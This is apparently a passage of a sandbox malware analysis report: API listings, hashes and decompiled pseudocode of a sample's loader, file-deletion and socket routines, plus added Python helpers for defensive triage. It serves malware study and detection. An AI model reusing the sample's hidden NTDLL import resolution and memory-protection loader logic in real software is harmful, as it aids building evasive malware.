                                          • Opcode Fuzzy Hash: d07bbc1b573347febf1aa77af4760e5035d12f1194af09bdfc3408afbebd1699
                                          • Instruction Fuzzy Hash: 15414532710A409AE7609FA2E854BAD33A1F788FD9F419225EE1957F58DF78C2498708
                                          Uniqueness

                                          Uniqueness Score: -1.00%
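The API lists in this report are the quickest triage signal for each function, but they are flat text: the file routine above (CreateFileW, three SetFilePointerEx calls, ReadFile, SetEndOfFile, CloseHandle, DeleteFileW) and the socket teardown earlier (shutdown, closesocket) only become useful once the call order can be checked mechanically. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's "• Api.MODULE(args), ref: ADDR" format, keeps direct calls apart from "Part of subcall function" entries (those belong to another function's address range), and flags ordered call sequences. The pattern names, the sample text (copied from the listing for the function at 00C801F5 plus two subcall entries from 00C7F758) and the helper names are this example's own constructions, not report signatures.

```python
import re

# Constructed sample input: API-list lines in the report's own format, copied from the
# function listing at 00C801F5-00C802FB plus two subcall entries from 00C7F758.
SAMPLE_API_LIST = """\
• memset.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00C801F5
• GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00C80218
• CreateFileW.KERNEL32 ref: 00C80241
• GetLastError.KERNEL32 ref: 00C80250
• SetFilePointerEx.KERNEL32 ref: 00C8026C
• SetFilePointerEx.KERNEL32 ref: 00C8027F
• ReadFile.KERNEL32 ref: 00C802B8
• SetFilePointerEx.KERNEL32 ref: 00C802DC
• SetEndOfFile.KERNEL32 ref: 00C802E5
• CloseHandle.KERNEL32 ref: 00C802EE
• DeleteFileW.KERNEL32 ref: 00C802FB
  • Part of subcall function 00C7F758: CreateMutexA.KERNEL32(?,?,?,00C6C267), ref: 00C7F7F0
  • Part of subcall function 00C7F758: GetLastError.KERNEL32(?,?,?,00C6C267), ref: 00C7F879
"""

# One bullet line: optional subcall prefix, Api.MODULE, optional (args), then "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_list(text):
    """Return one dict per bullet line, in report order. Raises on lines it cannot read,
    so a truncated listing is not mistaken for an absent API."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparsed API line: {line!r}")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": m.group("args"),            # None when the report shows no argument list
            "ref": int(m.group("ref"), 16),     # address of the call site
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


# Ordered call sequences worth flagging during triage (labels are this example's own,
# not report signatures). Other calls may sit between the listed ones.
PATTERNS = {
    "truncate_then_delete": ("SetFilePointerEx", "SetEndOfFile", "CloseHandle", "DeleteFileW"),
    "socket_teardown": ("shutdown", "closesocket"),
    "named_mutex_guard": ("CreateMutexA", "GetLastError"),
}


def contains_in_order(seq, pattern):
    """True if every name in pattern occurs in seq in that order (subsequence test)."""
    it = iter(seq)
    return all(any(x == name for x in it) for name in pattern)


def match_patterns(calls, include_subcalls=False):
    """Names of PATTERNS present in the function's call order. Subcall entries are
    excluded by default because they belong to a different function's address range."""
    seq = [c["api"] for c in calls if include_subcalls or c["subcall"] is None]
    return [name for name, pat in PATTERNS.items() if contains_in_order(seq, pat)]


def refs_for(calls, api):
    """Call-site addresses of one API, formatted like the report, for cross-referencing
    against the disassembly."""
    return [f"{c['ref']:08X}" for c in calls if c["api"] == api]


if __name__ == "__main__":
    calls = parse_api_list(SAMPLE_API_LIST)
    print(match_patterns(calls))                   # ['truncate_then_delete']
    print(refs_for(calls, "SetFilePointerEx"))     # ['00C8026C', '00C8027F', '00C802DC']
```

The subsequence test is deliberately loose: a function that truncates a file to zero and then unlinks it still matches when the decompiler shows extra calls in between, which is what you want when the listing comes from a 28%-quality decompilation. The subcall toggle matters for the same reason: the mutex-guard pattern only appears in this sample when the 00C7F758 entries are included, and attributing it to 00C801F5 would be wrong.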

                                          APIs
                                          • SetEvent.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B20F
                                          • shutdown.WS2_32 ref: 00C6B228
                                          • closesocket.WS2_32 ref: 00C6B232
                                          • EnterCriticalSection.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B240
                                          • shutdown.WS2_32 ref: 00C6B25A
                                          • CloseHandle.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B264
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B272
                                          • Sleep.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B27F
                                          • CloseHandle.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B298
                                          • CloseHandle.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B2A7
                                          • HeapFree.KERNEL32 ref: 00C82F1D
                                          • FreeLibrary.KERNEL32 ref: 00C82F2F
                                          • FreeLibrary.KERNEL32 ref: 00C82F41
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFreeHandle$CriticalLibrarySectionshutdown$EnterEventHeapLeaveSleepclosesocket
                                          • String ID:
                                          • API String ID: 2847004285-0
                                          • Opcode ID: 8a9e28428485d0e709d30c90a5324a0258120695dfeeae9dd847fd4691e1bd02
                                          • Instruction ID: ddad1905d9a6a72b8b7b018b1308c40103893880495e6d7fa3bd5f7cf132e320
                                          • Opcode Fuzzy Hash: 8a9e28428485d0e709d30c90a5324a0258120695dfeeae9dd847fd4691e1bd02
                                          • Instruction Fuzzy Hash: 89312F35706B40D6FB29DF62E8A876D2370FB84F94F548215DB5A47A24CF38C99AC304
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 57%
                                          			E00C619A8(signed int __edx, void* __edi, void* __ebp, long long __rbx, signed long long __rcx, void* __r9, long long _a8, signed int _a16, long long _a24, signed long long _a32) {
                                          				signed long long _v72;
                                          				void* __rdi;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				intOrPtr _t34;
                                          				signed long long _t36;
                                          				signed long long _t39;
                                          				signed long long _t40;
                                          				intOrPtr _t43;
                                          				intOrPtr _t44;
                                          				signed long long _t55;
                                          				intOrPtr _t56;
                                          				intOrPtr _t60;
                                          				void* _t62;
                                          				signed int _t64;
                                          				void* _t65;
                                          				signed long long _t74;
                                          				long long _t75;
                                          				signed long long _t77;
                                          				long long _t87;
                                          				intOrPtr _t107;
                                          				void* _t108;
                                          				signed long long _t109;
                                          				signed long long _t110;
                                          				void* _t112;
                                          				void* _t113;
                                          				void* _t124;
                                          				void* _t126;
                                          				signed long long _t127;
                                          				signed long long _t129;
                                          				signed long long _t130;
                                          
                                          				_t124 = __r9;
                                          				_t77 = __rcx;
                                          				_t75 = __rbx;
                                          				_t65 = __ebp;
                                          				_t62 = __edi;
                                          				_a8 = __rbx;
                                          				_a16 = __edx;
                                          				_t112 = _t113;
                                          				_t107 =  *0xc95608; // 0xcc5c50
                                          				r13d = 0;
                                          				_a32 = _t127;
                                          				_t64 = __edx & 0x00000010;
                                          				_a24 = _t127;
                                          				_t130 = __rcx;
                                          				_v72 = _t127;
                                          				_t108 =  !=  ?  *0xc95600 : _t107;
                                          				_t126 =  ==  ? E00C66190 : 0xc91400;
                                          				if(_t108 != 0) {
                                          					_t7 = _t108 + 0x3c; // 0xeba1f0e000000f0
                                          					_t69 =  *_t7;
                                          					_t56 =  *0xc95610; // 0x2b000
                                          					r14d =  *( *_t7 + _t108 + 0x50);
                                          					_t34 =  *0xc95614; // 0x35800
                                          					r14d = r14d + 0xfff;
                                          					r14d = r14d & 0xfffff000;
                                          					_t36 = E00C63450(_t56 + _t34 + 0xc58 + r14d,  *_t7, __rbx,  &_a32, _t108, _t111,  &_v72);
                                          					_t55 = _t36;
                                          					__eflags = _t36;
                                          					if(_t36 != 0) {
                                          						L26:
                                          						__eflags = _a32;
                                          						if(_a32 != 0) {
                                          							__eflags = _t77 | 0xffffffff;
                                          							E00C636F8();
                                          						}
                                          						__eflags = _v72;
                                          						if(_v72 != 0) {
                                          							CloseHandle();
                                          						}
                                          						goto L30;
                                          					}
                                          					_t77 = _v72;
                                          					_t39 = E00C636A8(_t124);
                                          					_t55 = _t39;
                                          					__eflags = _t39;
                                          					if(_t39 != 0) {
                                          						goto L26;
                                          					}
                                          					_t77 = _a32;
                                          					_t40 = E00C63554(_t69, _t75, _t77, _t108, _t111, _a24, _t124);
                                          					_t55 = _t40;
                                          					__eflags = _t40;
                                          					if(_t40 != 0) {
                                          						goto L26;
                                          					}
                                          					r8d =  *0xc95610; // 0x2b000
                                          					r13d = r14d;
                                          					memcpy(??, ??, ??);
                                          					r8d =  *0xc95614; // 0x35800
                                          					memcpy(??, ??, ??);
                                          					_t129 = _a32 + _t127;
                                          					 *((long long*)(_t129 + 0x30)) = _a24;
                                          					_t87 = _a24 + 0xc58 + _t127;
                                          					 *((long long*)(_t129 + 0x18)) = _t87;
                                          					_t60 =  *0xc95610; // 0x2b000
                                          					_t74 = _a24 + 0xc58;
                                          					 *((long long*)(_t129 + 0x20)) = _t87 + _t127 + _t74;
                                          					_t43 =  *0xc95610; // 0x2b000
                                          					 *((intOrPtr*)(_t129 + 0x28)) = _t43;
                                          					_t44 =  *0xc95614; // 0x35800
                                          					 *((intOrPtr*)(_t129 + 0x2c)) = _t44;
                                          					__eflags = _t64;
                                          					if(_t64 == 0) {
                                          						__eflags =  *0xc95618 - _t75; // 0x0
                                          						if(__eflags == 0) {
                                          							L17:
                                          							_t77 = L"NTDLL.DLL";
                                          							_t55 = 0x7f;
                                          							GetModuleHandleW(??);
                                          							_t109 = _t74;
                                          							__eflags = _t74;
                                          							if(_t74 == 0) {
                                          								L24:
                                          								__eflags = _t55;
                                          								if(_t55 == 0) {
                                          									r8d = 0x800;
                                          									memcpy(??, ??, ??);
                                          									_t77 = _t130;
                                          									r9d = _a16;
                                          									__eflags = _a24 + _t127;
                                          									_t55 = E00C64500(_t74, _t75, _t77, _a24 + _t127 + 0x48, _t111, _t112, _a24 + _t127);
                                          								}
                                          								goto L26;
                                          							}
                                          							_t77 = _t74;
                                          							E00C64B0C(_t62, _t65, _t74, _t75, _t77, "LdrLoadDll");
                                          							 *0xc95618 = _t74;
                                          							__eflags = _t74;
                                          							if(_t74 == 0) {
                                          								goto L24;
                                          							}
                                          							_t77 = _t109;
                                          							E00C64B0C(_t62, _t65, _t74, _t75, _t77, "LdrGetProcedureAddress");
                                          							 *0xc95620 = _t74;
                                          							__eflags = _t74;
                                          							if(_t74 == 0) {
                                          								goto L24;
                                          							}
                                          							_t77 = _t109;
                                          							E00C64B0C(_t62, _t65, _t74, _t75, _t77, "NtProtectVirtualMemory");
                                          							 *0xc95628 = _t74;
                                          							__eflags = _t74;
                                          							if(_t74 == 0) {
                                          								goto L24;
                                          							}
                                          							_t55 = 0;
                                          							__eflags = 0;
                                          							L22:
                                          							L23:
                                          							r8d = 0x18;
                                          							_t77 = _t129;
                                          							memcpy(??, ??, ??);
                                          							goto L24;
                                          						}
                                          						__eflags =  *0xc95620 - _t75; // 0x0
                                          						if(__eflags == 0) {
                                          							goto L17;
                                          						}
                                          						__eflags =  *0xc95628 - _t75; // 0x0
                                          						if(__eflags != 0) {
                                          							goto L22;
                                          						}
                                          						goto L17;
                                          					}
                                          					__eflags =  *0xc95630 - _t75; // 0x0
                                          					_t110 =  *_t130;
                                          					if(__eflags == 0) {
                                          						L9:
                                          						_t111 = "NTDLL.DLL";
                                          						_t77 = _t110;
                                          						_t55 = 0x7f;
                                          						E00C64750(_t60, _t65, __eflags, _t75, _t77, "NTDLL.DLL", "NTDLL.DLL", "LdrLoadDll");
                                          						 *0xc95630 = _t74;
                                          						__eflags = _t74;
                                          						if(__eflags == 0) {
                                          							goto L24;
                                          						}
                                          						_t77 = _t110;
                                          						E00C64750(_t60, _t65, __eflags, _t75, _t77, "NTDLL.DLL", _t111, "LdrGetProcedureAddress");
                                          						 *0xc95638 = _t74;
                                          						__eflags = _t74;
                                          						if(__eflags == 0) {
                                          							goto L24;
                                          						}
                                          						_t77 = _t110;
                                          						E00C64750(_t60, _t65, __eflags, _t75, _t77, _t111, _t111, "NtProtectVirtualMemory");
                                          						 *0xc95640 = _t74;
                                          						__eflags = _t74;
                                          						if(_t74 == 0) {
                                          							goto L24;
                                          						}
                                          						_t55 = 0;
                                          						__eflags = 0;
                                          						L13:
                                          						goto L23;
                                          					}
                                          					__eflags =  *0xc95638 - _t75; // 0x0
                                          					if(__eflags == 0) {
                                          						goto L9;
                                          					}
                                          					__eflags =  *0xc95640 - _t75; // 0x0
                                          					if(__eflags != 0) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				} else {
                                          					_t6 = _t108 + 2; // 0xcc5c52
                                          					_t55 = _t6;
                                          					L30:
                                          					return _t55;
                                          				}
                                          			}

                                          Instruction addresses for the C-Code listing above run from 0x00c619a8 to 0x00c61cc7; the per-line address column is not reproduced here.

                                          APIs
                                          • memcpy.NTDLL(?,00000000,00001644,?,?,00C6175C), ref: 00C61AA1
                                          • memcpy.NTDLL(?,00000000,00001644,?,?,00C6175C), ref: 00C61ACA
                                          • memcpy.NTDLL ref: 00C61C5C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: LdrGetProcedureAddress$LdrLoadDll$NTDLL.DLL$NTDLL.DLL$NtProtectVirtualMemory
                                          • API String ID: 3510742995-2923435655
                                          • Opcode ID: 3f1cffd34a13ac728c0ddd1c75c759440b581e5ccda2ef14251662932a17911c
                                          • Instruction ID: 4c835d3b000ceab888bcb536ee7c0ab8bbfae591ce2562ce1a71d2a731dc3206
                                          • Opcode Fuzzy Hash: 3f1cffd34a13ac728c0ddd1c75c759440b581e5ccda2ef14251662932a17911c
                                          • Instruction Fuzzy Hash: EC81BCB5301F4096FF25CF56E894BA933A1FB487A9F880625ED2947714EF38C618C344
                                          Uniqueness

                                          Uniqueness Score: -1.00%
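
                                          Analyst note on the E00C619A8 listing above, with an added worked example. The function reads e_lfanew (+0x3c) and OptionalHeader.SizeOfImage (NT header +0x50) from an in-memory PE, rounds SizeOfImage up to a page, adds the two sizes held in the globals at 0xc95610 / 0xc95614 (annotated as 0x2b000 and 0x35800 at dump time) plus 0xc58, and then resolves LdrLoadDll, LdrGetProcedureAddress and NtProtectVirtualMemory from NTDLL.DLL (the ANSI and UTF-16LE name strings both occur) before copying the blobs into place. The Python below is example code written for this page, not the sample's code and not Joe Sandbox output: it reproduces the size arithmetic on a constructed PE header and applies a coarse string-presence check for the same export triple to a constructed byte buffer. Treating the computed value as a buffer size for E00C63450, and the constructed inputs, are assumptions of the example; the hit check is a triage heuristic, not a signature.

```python
import struct

# Values the stub reads from the globals at 0xc95610 / 0xc95614 (report annotates them
# as 0x2b000 and 0x35800 at dump time) plus the fixed 0xc58 it adds. Their meaning is
# not stated in the report; reading the sum as an allocation size is an assumption.
BLOB_A_SIZE = 0x2B000
BLOB_B_SIZE = 0x35800
FIXED_EXTRA = 0xC58

# Export names the stub resolves from NTDLL; both name encodings appear in the listing.
RESOLVED_EXPORTS = (b"LdrLoadDll", b"LdrGetProcedureAddress", b"NtProtectVirtualMemory")
NTDLL_ANSI = b"NTDLL.DLL"
NTDLL_WIDE = "NTDLL.DLL".encode("utf-16-le")


def page_align(n: int) -> int:
    """(n + 0xfff) & 0xfffff000, exactly as the stub rounds SizeOfImage."""
    return (n + 0xFFF) & ~0xFFF


def size_of_image(pe: bytes) -> int:
    """Read OptionalHeader.SizeOfImage via e_lfanew (+0x3c) and NT header +0x50.

    +0x50 holds SizeOfImage for both PE32 and PE32+ (0x18 prefix + 0x38 in the
    optional header), so no magic check is needed for this field.
    """
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return struct.unpack_from("<I", pe, e_lfanew + 0x50)[0]


def stub_buffer_size(pe: bytes) -> int:
    """Reproduce the first argument the stub hands to E00C63450 (assumed buffer size)."""
    return BLOB_A_SIZE + BLOB_B_SIZE + FIXED_EXTRA + page_align(size_of_image(pe))


def build_fake_pe_header(size_of_image_value: int) -> bytes:
    """Constructed minimal DOS + NT header (PE32+ magic); sample input only."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: NT header follows DOS header
    nt = bytearray(0x18 + 0xF0)                         # signature + COFF + PE32+ optional header
    nt[:4] = b"PE\0\0"
    struct.pack_into("<H", nt, 0x18, 0x20B)             # OptionalHeader.Magic = PE32+
    struct.pack_into("<I", nt, 0x50, size_of_image_value)
    return bytes(dos + nt)


def resolver_string_hits(dump: bytes) -> dict[str, int]:
    """Offset of each marker string in the buffer, -1 when absent."""
    hits = {
        "NTDLL.DLL(ansi)": dump.find(NTDLL_ANSI),
        "NTDLL.DLL(wide)": dump.find(NTDLL_WIDE),
    }
    for name in RESOLVED_EXPORTS:
        hits[name.decode()] = dump.find(name)
    return hits


def looks_like_ntdll_resolver(dump: bytes) -> bool:
    """True when an NTDLL.DLL string (either encoding) and all three export names occur."""
    hits = resolver_string_hits(dump)
    has_ntdll = hits["NTDLL.DLL(ansi)"] >= 0 or hits["NTDLL.DLL(wide)"] >= 0
    return has_ntdll and all(hits[n.decode()] >= 0 for n in RESOLVED_EXPORTS)


# Constructed sample inputs; not taken from the report's memory dump.
SAMPLE_HEADER = build_fake_pe_header(0x35A10)
SAMPLE_DUMP = (b"\x00" * 0x20 + NTDLL_ANSI + b"\x00" + NTDLL_WIDE + b"\x00\x00"
               + b"".join(n + b"\x00" for n in RESOLVED_EXPORTS) + b"\xCC" * 0x20)
BENIGN_DUMP = b"kernel32.dll\x00LoadLibraryW\x00GetProcAddress\x00"

if __name__ == "__main__":
    print(hex(stub_buffer_size(SAMPLE_HEADER)))        # 0x97458
    print(looks_like_ntdll_resolver(SAMPLE_DUMP))      # True
    print(looks_like_ntdll_resolver(BENIGN_DUMP))      # False
```

                                          The string check is deliberately loose: legitimate loaders also reference these NTDLL exports, so a hit should only raise the priority of the region for manual review, while a miss on a packed or encrypted dump proves nothing. The size arithmetic is the part worth keeping: if the globals differ in another run of the sample, replace the two constants with the values the report annotates for that run.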

                                          APIs
                                          • lstrlenA.KERNEL32(?,?,?,00C63740), ref: 00C7787E
                                          • StrRChrA.SHLWAPI(?,?,?,00C63740), ref: 00C77890
                                          • _strnicmp.NTDLL ref: 00C778BE
                                          • HeapAlloc.KERNEL32(?,?,?,00C63740), ref: 00C778E2
                                          • SetLastError.KERNEL32(?,?,?,00C63740), ref: 00C778F3
                                          • memcpy.NTDLL(?,?,?,00C63740), ref: 00C77906
                                          • lstrcpyA.KERNEL32(?,?,?,00C63740), ref: 00C77912
                                          • lstrcmpiA.KERNEL32(?,?,?,00C63740), ref: 00C77922
                                          • lstrcatA.KERNEL32(?,?,?,00C63740), ref: 00C77936
                                          • lstrcatA.KERNEL32(?,?,?,00C63740), ref: 00C77942
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$AllocErrorHeapLast_strnicmplstrcmpilstrcpylstrlenmemcpy
                                          • String ID: Default
                                          • API String ID: 2130173156-753088835
                                          • Opcode ID: 6e43100410e76e44178096203c499ac02f105e119f4743cddb5a0befb338392e
                                          • Instruction ID: 7093c79bf6a6d24d469180c8f175ff84894ce898a44b883f3b79b2217e678527
                                          • Opcode Fuzzy Hash: 6e43100410e76e44178096203c499ac02f105e119f4743cddb5a0befb338392e
                                          • Instruction Fuzzy Hash: 7B318DA5301A8585EA14DF23E854B59B3A1FB89FD0F88C225CE5E47B64EF3CD54AC704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleHeaplstrcatlstrlen$AllocFreelstrcpymemset
                                          • String ID: h
                                          • API String ID: 916770911-2439710439
                                          • Opcode ID: d4a323cd91a2d61c9d604e931f1f4f61badf3ab68832d48115016ebed7410c1a
                                          • Instruction ID: e1ee91b64d6400a321d8e5dade937f45e63c7c29948d7878445fc8de1bb69bbd
                                          • Opcode Fuzzy Hash: d4a323cd91a2d61c9d604e931f1f4f61badf3ab68832d48115016ebed7410c1a
                                          • Instruction Fuzzy Hash: F2311A36204F8086EB20DF26F85475AB3A5F7C8FD4F958125DA8A47B28DF78C54ACB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenA.KERNEL32 ref: 00C63811
                                          • MultiByteToWideChar.KERNEL32 ref: 00C6385E
                                          • lstrlenA.KERNEL32 ref: 00C638AF
                                          • lstrlenA.KERNEL32 ref: 00C638C1
                                          • HeapAlloc.KERNEL32 ref: 00C638D6
                                          • lstrcpyA.KERNEL32 ref: 00C638FC
                                          • lstrcatA.KERNEL32 ref: 00C6390C
                                          • lstrcatA.KERNEL32 ref: 00C63919
                                          • HeapFree.KERNEL32 ref: 00C63987
                                            • Part of subcall function 00C7784C: lstrlenA.KERNEL32(?,?,?,00C63740), ref: 00C7787E
                                            • Part of subcall function 00C7784C: StrRChrA.SHLWAPI(?,?,?,00C63740), ref: 00C77890
                                            • Part of subcall function 00C7784C: _strnicmp.NTDLL ref: 00C778BE
                                            • Part of subcall function 00C7784C: HeapAlloc.KERNEL32(?,?,?,00C63740), ref: 00C778E2
                                            • Part of subcall function 00C7784C: SetLastError.KERNEL32(?,?,?,00C63740), ref: 00C778F3
                                          • HeapFree.KERNEL32 ref: 00C639A1
                                          • HeapFree.KERNEL32 ref: 00C639C6
                                          • SetLastError.KERNEL32 ref: 00C639D2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$lstrlen$Free$AllocErrorLastlstrcat$ByteCharMultiWide_strnicmplstrcpy
                                          • String ID:
                                          • API String ID: 2865314823-0
                                          • Opcode ID: 0dac1df1654789e0e6ca1ab8e3738428ddf44d81534edbe49ee50370b3280ddd
                                          • Instruction ID: 3bd1a30fba255c0dd0a00798f8d202e3c5e9c395314e5a46bcfddffcf390d16b
                                          • Opcode Fuzzy Hash: 0dac1df1654789e0e6ca1ab8e3738428ddf44d81534edbe49ee50370b3280ddd
                                          • Instruction Fuzzy Hash: 3B718336201FC186EB25CF66E88079937A0F788FA8F488616EE6D47B58DF78C645C744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 15%
                                          			E00C82BBC(void* __ebx, void* __ecx, void* __edx, void* __rax, void* __r9, void* _a8, void* _a16, void* _a24, long long _a32) {
                                          				void* _v48;
                                          				void* _v56;
                                          				signed int _v64;
                                          				void* _v72;
                                          				long long _v88;
                                          				void* __rbx;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				long _t50;
                                          				signed int _t54;
                                          				signed int _t63;
                                          				signed short _t64;
                                          				long _t65;
                                          				signed int _t66;
                                          				long _t70;
                                          				signed short _t72;
                                          				signed short _t82;
                                          				void* _t83;
                                          				signed int _t101;
                                          				long long _t102;
                                          				signed long long _t110;
                                          				signed int _t111;
                                          				signed long long _t122;
                                          				void* _t123;
                                          				long long _t124;
                                          				void* _t125;
                                          				void* _t126;
                                          				long long _t131;
                                          				signed long long _t132;
                                          				long long _t136;
                                          				intOrPtr* _t137;
                                          				long long _t140;
                                          
                                          				_t125 = _t126;
                                          				r14d = 0;
                                          				_t83 =  *0xc95914 - r14d; // 0x0
                                          				if(_t83 == 0) {
                                          					EnterCriticalSection();
                                          					_t101 =  *0xc958c8; // 0x0
                                          					_t82 =  *0xc958fc; // 0x0
                                          					 *0xc95914 = 1;
                                          					_t50 = GetTickCount();
                                          					asm("btr eax, 0x1f");
                                          					__eflags = _t50 -  *0xc958c0 - 0xc8;
                                          					if(_t50 -  *0xc958c0 > 0xc8) {
                                          						GetSystemTimeAsFileTime();
                                          						__eflags = _t101;
                                          						if(_t101 != 0) {
                                          							_t122 = _v64 - _t101;
                                          							E00C82AC8(_t101,  &_a16,  &_a8, _t123, _t125,  &_a24);
                                          							GetCurrentProcess();
                                          							_v88 =  &_v72;
                                          							_t54 = GetProcessTimes(??, ??, ??, ??, ??);
                                          							_t102 = _a8;
                                          							_t124 = _a24;
                                          							_t140 = _a16;
                                          							_t110 = _t102 -  *0xc958e0 -  *0xc958d8 + _t124;
                                          							__eflags = _t110;
                                          							if(_t110 == 0) {
                                          								r10d = r14d;
                                          							} else {
                                          								asm("dec eax");
                                          								_t54 = _t54 / _t110;
                                          							}
                                          							_t136 = _a32;
                                          							_t131 = _v72;
                                          							_t111 = _v64;
                                          							 *0xc958f0 = _t131;
                                          							_t132 =  *0xc958f8;
                                          							asm("dec eax");
                                          							 *0xc958e8 = _t136;
                                          							 *(0xc95900 + _t132 * 4) = r10d;
                                          							_t137 = 0xc95918;
                                          							 *(0xc95918 + _t132 * 4) = _t54 / _t122;
                                          							r8d = r8d + 1;
                                          							 *0xc958c8 = _t111;
                                          							 *0xc958d0 = _t140;
                                          							 *0xc958d8 = _t102;
                                          							 *0xc958e0 = _t124;
                                          							r8d =  *0xc958c4; // 0x0
                                          							r8d = r8d + 1;
                                          							 *0xc958f8 = 0x3256400 + (_t136 -  *0xc958f0 -  *0xc958e8 + _t131) * 0x64;
                                          							__eflags = r8d - 5;
                                          							r8d =  >  ? 5 : r8d;
                                          							_t63 = r14d;
                                          							 *0xc958c4 = r8d;
                                          							__eflags = r8d;
                                          							if(r8d > 0) {
                                          								do {
                                          									_t63 = _t63 +  *_t137;
                                          									_t137 = _t137 + 4;
                                          									_t111 = _t111 - 1;
                                          									__eflags = _t111;
                                          								} while (_t111 != 0);
                                          							}
                                          							asm("cdq");
                                          							_t64 = _t63 / r8d;
                                          							_t72 = _t64;
                                          							 *0xc958fc = _t64;
                                          							_t65 = GetTickCount();
                                          							__eflags =  *0xc95914 - r14d; // 0x0
                                          							 *0xc958c0 = _t65;
                                          							if(__eflags != 0) {
                                          								LeaveCriticalSection();
                                          							}
                                          							_t66 = _t72 & 0x0000ffff;
                                          						} else {
                                          							E00C82AC8(_t101,  &_a16,  &_a8, _t123, _t125,  &_a24);
                                          							GetCurrentProcess();
                                          							_v88 =  &_v72;
                                          							GetProcessTimes(??, ??, ??, ??, ??);
                                          							 *0xc958c8 = _v64;
                                          							 *0xc958d0 = _a16;
                                          							 *0xc958d8 = _a8;
                                          							 *0xc958e0 = _a24;
                                          							 *0xc958e8 = _a32;
                                          							 *0xc958f0 = _v72;
                                          							 *0xc958fc = r14d;
                                          							_t70 = GetTickCount();
                                          							__eflags =  *0xc95914 - r14d; // 0x0
                                          							 *0xc958c0 = _t70;
                                          							if(__eflags != 0) {
                                          								LeaveCriticalSection();
                                          							}
                                          							_t66 = r14w & 0xffffffff;
                                          						}
                                          					} else {
                                          						__eflags =  *0xc95914 - r14d; // 0x0
                                          						if(__eflags != 0) {
                                          							LeaveCriticalSection();
                                          						}
